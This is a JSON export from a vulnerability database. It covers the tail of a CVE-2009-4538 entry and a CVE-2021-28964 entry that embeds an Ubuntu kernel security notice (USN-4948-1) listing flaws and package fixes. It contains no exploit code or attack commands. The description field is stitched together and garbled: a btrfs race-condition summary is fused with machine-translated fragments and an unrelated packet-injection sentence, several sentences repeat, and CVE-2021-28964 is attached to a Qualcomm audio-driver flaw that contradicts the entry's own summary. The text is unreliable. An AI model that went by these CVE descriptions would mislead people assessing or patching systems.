        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "db": "BID",
        "id": "37523"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "db": "BID",
        "id": "37523"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-01-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "date": "2010-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "date": "2009-12-29T00:00:00",
        "db": "BID",
        "id": "37523"
      },
      {
        "date": "2010-02-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "date": "2010-03-01T21:20:35",
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "date": "2010-02-05T16:17:54",
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "date": "2010-05-28T20:14:56",
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "date": "2009-06-04T14:00:34",
        "db": "PACKETSTORM",
        "id": "78056"
      },
      {
        "date": "2010-02-15T20:31:13",
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "date": "2009-12-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "date": "2010-01-12T17:30:00.917000",
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-41984"
      },
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "date": "2015-04-13T21:26:00",
        "db": "BID",
        "id": "37523"
      },
      {
        "date": "2010-04-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      },
      {
        "date": "2010-01-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      },
      {
        "date": "2018-11-16T15:53:05.147000",
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  e1000e Vulnerability in Ethernet frame handling in driver",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-078"
      }
    ],
    "trust": 0.6
  }
}

var-202103-1240
Vulnerability from variot

A race condition was discovered in get_old_root in fs/btrfs/ctree.c in the Linux kernel through 5.11.8. It allows attackers to cause a denial of service (BUG) because of a lack of locking on an extent buffer before a cloning operation, aka CID-dbcc7d57bffc. Vendor exploits this vulnerability CID-dbcc7d57bffc Is published as.Denial of service (DoS) It may be put into a state. A physically proximate attacker could use this issue to inject packets. ========================================================================== Ubuntu Security Notice USN-4948-1 May 11, 2021

linux-oem-5.10 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-oem-5.10: Linux kernel for OEM systems

Details:

Ryota Shiga discovered that the eBPF implementation in the Linux kernel did not properly verify that a BPF program only reserved as much memory for a ring buffer as was allocated. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3489)

Manfred Paul discovered that the eBPF implementation in the Linux kernel did not properly track bounds on bitwise operations. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3491)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)

It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). A local attacker could use this to cause a denial of service. (CVE-2021-28951)

John Stultz discovered that the audio driver for Qualcomm SDM845 systems in the Linux kernel did not properly validate port ID numbers. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-28964)

Vince Weaver discovered that the perf subsystem in the Linux kernel did not properly handle certain PEBS records properly for some Intel Haswell processors. A local attacker could use this cause a denial of service (system crash). (CVE-2021-28971)

It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)

It was discovered that the Freescale Gianfar Ethernet driver for the Linux kernel did not properly handle receive queue overrun when jumbo frames were enabled in some situations. An attacker could use this to cause a denial of service (system crash). An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-29266)

It was discovered that the TIPC protocol implementation in the Linux kernel did not properly validate passed encryption key sizes. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29646)

It was discovered that the Qualcomm IPC router implementation in the Linux kernel did not properly initialize memory passed to user space. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-29647)

It was discovered that the BPF user mode driver implementation in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)

Felix Wilhelm discovered that the KVM implementation in the Linux kernel for AMD processors contained race conditions on nested VMCB controls. A local attacker in a guest vm could possibly use this to gain elevated privileges. (CVE-2021-29657)

Dan Carpenter discovered that the block device manager (dm) implementation in the Linux kernel contained a buffer overflow in the ioctl for listing devices. A privileged local attacker could use this to cause a denial of service (system crash). (CVE-2021-31916)

马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.10.0-1026-oem 5.10.0-1026.27 linux-image-oem-20.04b 5.10.0.1026.27

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4948-1 CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2021-28688, CVE-2021-28951, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971, CVE-2021-28972, CVE-2021-29264, CVE-2021-29266, CVE-2021-29646, CVE-2021-29647, CVE-2021-29649, CVE-2021-29650, CVE-2021-29657, CVE-2021-31916, CVE-2021-3483, CVE-2021-3489, CVE-2021-3490, CVE-2021-3491

Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1240",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.8"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "fas 500f",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "aff a250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.11.8  until"
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.11.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a250_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas_500f_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas_500f:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ],
    "trust": 1.1
  },
  "cve": "CVE-2021-28964",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 1.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 1.9,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28964",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 1.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "id": "VHN-388477",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.0,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 4.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28964",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28964",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-1265",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-388477",
            "trust": 0.1,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-28964",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A race condition was discovered in get_old_root in fs/btrfs/ctree.c in the Linux kernel through 5.11.8. It allows attackers to cause a denial of service (BUG) because of a lack of locking on an extent buffer before a cloning operation, aka CID-dbcc7d57bffc. Vendor exploits this vulnerability CID-dbcc7d57bffc Is published as.Denial of service (DoS) It may be put into a state. A physically proximate\nattacker could use this issue to inject packets. ==========================================================================\nUbuntu Security Notice USN-4948-1\nMay 11, 2021\n\nlinux-oem-5.10 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.10: Linux kernel for OEM systems\n\nDetails:\n\nRyota Shiga discovered that the eBPF implementation in the Linux kernel did\nnot properly verify that a BPF program only reserved as much memory for a\nring buffer as was allocated. A local attacker could use this to cause a\ndenial of service (system crash) or execute arbitrary code. (CVE-2021-3489)\n\nManfred Paul discovered that the eBPF implementation in the Linux kernel\ndid not properly track bounds on bitwise operations. A local attacker could\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. A local attacker could use this to cause a denial of service\n(system crash) or execute arbitrary code. (CVE-2021-3491)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). A local attacker could\nuse this to cause a denial of service. (CVE-2021-28951)\n\nJohn Stultz discovered that the audio driver for Qualcomm SDM845 systems in\nthe Linux kernel did not properly validate port ID numbers. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. \nA local attacker could possibly use this to cause a denial of service\n(system crash). (CVE-2021-28964)\n\nVince Weaver discovered that the perf subsystem in the Linux kernel did\nnot properly handle certain PEBS records properly for some Intel Haswell\nprocessors. A local attacker could use this cause a denial of service\n(system crash). (CVE-2021-28971)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that the Freescale Gianfar Ethernet driver for the Linux\nkernel did not properly handle receive queue overrun when jumbo frames were\nenabled in some situations. An attacker could use this to cause a denial of\nservice (system crash). An attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-29266)\n\nIt was discovered that the TIPC protocol implementation in the Linux kernel\ndid not properly validate passed encryption key sizes. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2021-29646)\n\nIt was discovered that the Qualcomm IPC router implementation in the Linux\nkernel did not properly initialize memory passed to user space. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-29647)\n\nIt was discovered that the BPF user mode driver implementation in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nFelix Wilhelm discovered that the KVM implementation in the Linux kernel\nfor AMD processors contained race conditions on nested VMCB controls. A\nlocal attacker in a guest vm could possibly use this to gain elevated\nprivileges. (CVE-2021-29657)\n\nDan Carpenter discovered that the block device manager (dm) implementation\nin the Linux kernel contained a buffer overflow in the ioctl for listing\ndevices. A privileged local attacker could use this to cause a denial of\nservice (system crash). (CVE-2021-31916)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer\ndriver in the Linux kernel did not properly perform reference counting in\nsome situations, leading to a use-after-free vulnerability. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-3483)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.10.0-1026-oem     5.10.0-1026.27\n  linux-image-oem-20.04b          5.10.0.1026.27\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4948-1\n  CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2021-28688,\n  CVE-2021-28951, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971,\n  CVE-2021-28972, CVE-2021-29264, CVE-2021-29266, CVE-2021-29646,\n  CVE-2021-29647, CVE-2021-29649, CVE-2021-29650, CVE-2021-29657,\n  CVE-2021-31916, CVE-2021-3483, CVE-2021-3489, CVE-2021-3490,\n  CVE-2021-3491\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28964"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731"
      },
      {
        "db": "VULHUB",
        "id": "VHN-388477"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28964"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166568"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-28964",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166568",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162939",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162981",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162549",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004731",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1265",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1919",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1299",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1625",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1655",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2217",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1307",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1964",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1408",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1946",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
